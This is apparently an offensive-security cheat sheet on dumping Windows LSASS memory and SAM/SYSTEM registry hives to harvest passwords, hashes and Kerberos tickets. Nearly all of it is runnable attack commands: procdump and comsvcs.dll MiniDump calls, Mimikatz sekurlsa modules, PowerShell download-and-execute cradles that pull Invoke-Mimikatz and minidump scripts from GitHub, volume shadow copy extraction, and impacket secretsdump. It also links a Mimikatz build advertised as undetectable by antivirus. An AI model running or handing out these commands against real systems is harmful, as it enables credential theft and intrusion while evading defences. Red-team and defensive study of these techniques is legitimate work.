Craft a comprehensive guide detailing various methods for dumping the LSASS.
I think This will be a valuable one and will make people stay updated on new techniques.
Procdump is a part of Microsoft Sysinternals and a command-line
utility programs for producing dumps of any running process
We can leverage it and use it fo DUMP lsass process by the following:
procdump.exe -ma lsass.exe C:\path\lsass.dmp
Mimikatz can both dump the LSASS process and read from an LSASS dump:
privilege::debug = Debugging Mode
sekurlsa::logonPasswords = Dump passwords
- To Read from an LSASS dump:
sekurlsa::minidump C:\path\lsass.dmp sekurlsa::logonpasswords
This is a native Windows utility method which can we can use:
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <LSASS_Process_ID> C:\path
for getting lsass process ID, you can RUN "Get-Process lsass" on powershell.
- User can also done this by making a PS script containing the following:
$lsass = Get-Process lsass $dumpPath = "C:\Users\Adwin2\Desktop\lsass.dmp" rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $($lsass.Id) $dumpPath full
Note: Change $dumpPath
Ensure the Out-Minidump function is loaded in your PowerShell session
IEX (New-Object Net.WebClient).DownloadString('https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Out-Minidump.ps1')"
Get-Process lsass | Out-Minidump -DumpFilePath C:\Path\To\Dump
IEX (New-Object Net.WebClient).DownloadString('https://github.com/chvancooten/OSEP-Code-Snippets/raw/main/MiniDump/MiniDump.ps1')
Reults will be save on C:\Windows\Tasks.
Download & Import the Script:
First, you need to get the Invoke-Mimikatz.ps1 script from the GitHub repository.
If you're working directly on the machine:
IEX (New-Object Net.WebClient).DownloadString('https://github.com/g4uss47/Invoke-Mimikatz/raw/master/Invoke-Mimikatz.ps1')
Invoke Mimikatz to Dump LSASS:
Once the module is imported, you can run Invoke-Mimikatz to dump the LSASS
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonPasswords"'
- You can also using minidump module to select where to read:
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::minidump C:\Path\To\Load\Lsass"'
SAM/SECURITY Hives: These contain local account information and system security policies. Dumping from these hives can provide hashed passwords for local accounts and details about security settings. This method requires access to system files either offline or through the system registry.
LSASS Process: LSASS handles both local and domain credentials, managing in-memory credential caches that include plaintext passwords, hashes, and Kerberos tickets. Dumping from LSASS offers a more comprehensive set of credentials, including those of currently logged-in users. This requires administrative access and is performed on a running system.
On windows 10/11:
1. $shadow = [WMIClass]"root\cimv2:Win32_ShadowCopy"
2. $shadow.Create("C:\\", "ClientAccessible")
3. copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[Number]\windows\system32\config\SAM C:\[SAM\To\Be\Saved\]
4. copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[Number]\windows\system32\config\SYSTEM C:\[SYSTEM\To\Be\Saved\]
5. python3 /opt/impacket/examples/secretsdump.py -sam Sam -system SYSTEM LOCAL
Visit the link - > https://github.com/HernanRodriguez1/MimikatzFUD
Build: mimikatz 2.2.0 (x64) #19041 Aug 10 2021 02:01:23
Tested: Microsoft Windows 11 Pro - 10.0.22000 N/D Compilación 22000